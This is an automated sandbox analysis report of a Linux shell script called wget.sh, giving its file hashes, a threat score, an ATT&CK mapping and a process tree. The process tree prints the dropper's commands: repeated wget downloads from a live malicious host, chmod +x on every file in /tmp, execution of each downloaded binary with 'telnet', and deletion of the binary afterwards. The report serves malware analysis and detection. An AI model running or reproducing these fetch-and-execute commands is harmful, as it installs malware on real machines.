520ee4f7fba6358cfef4aa216cfe0294fd8b4c28b5b8c0fe6de83b3ca208249a

Analysis

max time kernel
0s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
19-12-2024 22:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wget.sh
Size

809B
MD5

1e8348b42b38787c7c1660f00ece290d
SHA1

e031daa5ac284dcd2fd0f34f6918b6957efdd3c3
SHA256

520ee4f7fba6358cfef4aa216cfe0294fd8b4c28b5b8c0fe6de83b3ca208249a
SHA512

634e2e20f250cd47c0df75bcc6b23b150e81585f262f2229890337aab21d6fde56b0a264892ab9a34849e01ad118b8b544a86a5fa1688b23aa10b2d433274a2e

Score

7^/10

defense_evasion

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1519	chmod
1540	chmod
1554	chmod
1568	chmod
1582	chmod
1526	chmod
1533	chmod
1547	chmod
1564	chmod
1575	chmod

/tmp/wget.sh
/tmp/wget.sh
1⤵
PID:1517
- /usr/bin/wget
  wget http://cp.eye-network.ru/wkb86
  2⤵
  PID:1518
- /bin/chmod
  chmod +x config-err-IZfVsQ netplan_enwh8izm snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-y4KmDc wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /tmp/wkb86
  ./wkb86 telnet
  2⤵
  PID:1523
- /bin/rm
  rm -rf wkb86
  2⤵
  PID:1524
- /usr/bin/wget
  wget http://cp.eye-network.ru/kqibeps
  2⤵
  PID:1525
- /bin/chmod
  chmod +x config-err-IZfVsQ netplan_enwh8izm snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-y4KmDc wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/kqibeps
  ./kqibeps telnet
  2⤵
  PID:1527
- /bin/rm
  rm -rf kqibeps
  2⤵
  PID:1528
- /usr/bin/wget
  wget http://cp.eye-network.ru/bojwsl
  2⤵
  PID:1532
- /bin/chmod
  chmod +x config-err-IZfVsQ netplan_enwh8izm snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-y4KmDc wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1533
- /tmp/bojwsl
  ./bojwsl telnet
  2⤵
  PID:1537
- /bin/rm
  rm -rf bojwsl
  2⤵
  PID:1538
- /usr/bin/wget
  wget http://cp.eye-network.ru/njvwa4
  2⤵
  PID:1539
- /bin/chmod
  chmod +x config-err-IZfVsQ netplan_enwh8izm snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-y4KmDc wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1540
- /tmp/njvwa4
  ./njvwa4 telnet
  2⤵
  PID:1544
- /bin/rm
  rm -rf njvwa4
  2⤵
  PID:1545
- /usr/bin/wget
  wget http://cp.eye-network.ru/ngwa5
  2⤵
  PID:1546
- /bin/chmod
  chmod +x config-err-IZfVsQ netplan_enwh8izm snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-y4KmDc wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1547
- /tmp/ngwa5
  ./ngwa5 telnet
  2⤵
  PID:1551
- /bin/rm
  rm -rf ngwa5
  2⤵
  PID:1552
- /usr/bin/wget
  wget http://cp.eye-network.ru/woega6
  2⤵
  PID:1553
- /bin/chmod
  chmod +x config-err-IZfVsQ netplan_enwh8izm snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-y4KmDc wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1554
- /tmp/woega6
  ./woega6 telnet
  2⤵
  PID:1558
- /bin/rm
  rm -rf woega6
  2⤵
  PID:1559
- /usr/bin/wget
  wget http://cp.eye-network.ru/fnkea7
  2⤵
  PID:1560
- /bin/chmod
  chmod +x config-err-IZfVsQ netplan_enwh8izm snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-y4KmDc wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1564
- /tmp/fnkea7
  ./fnkea7 telnet
  2⤵
  PID:1565
- /bin/rm
  rm -rf fnkea7
  2⤵
  PID:1566
- /usr/bin/wget
  wget http://cp.eye-network.ru/gnjqwpc
  2⤵
  PID:1567
- /bin/chmod
  chmod +x config-err-IZfVsQ netplan_enwh8izm snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-y4KmDc wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1568
- /tmp/gnjqwpc
  ./gnjqwpc telnet
  2⤵
  PID:1572
- /bin/rm
  rm -rf gnjqwpc
  2⤵
  PID:1573
- /usr/bin/wget
  wget http://cp.eye-network.ru/wlw68k
  2⤵
  PID:1574
- /bin/chmod
  chmod +x config-err-IZfVsQ netplan_enwh8izm snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-y4KmDc wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1575
- /tmp/wlw68k
  ./wlw68k telnet
  2⤵
  PID:1579
- /bin/rm
  rm -rf wlw68k
  2⤵
  PID:1580
- /usr/bin/wget
  wget http://cp.eye-network.ru/wrjkngh4
  2⤵
  PID:1581
- /bin/chmod
  chmod +x config-err-IZfVsQ netplan_enwh8izm snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-y4KmDc wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1582
- /tmp/wrjkngh4
  ./wrjkngh4 telnet
  2⤵
  PID:1583
- /bin/rm
  rm -rf wrjkngh4
  2⤵
  PID:1587

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads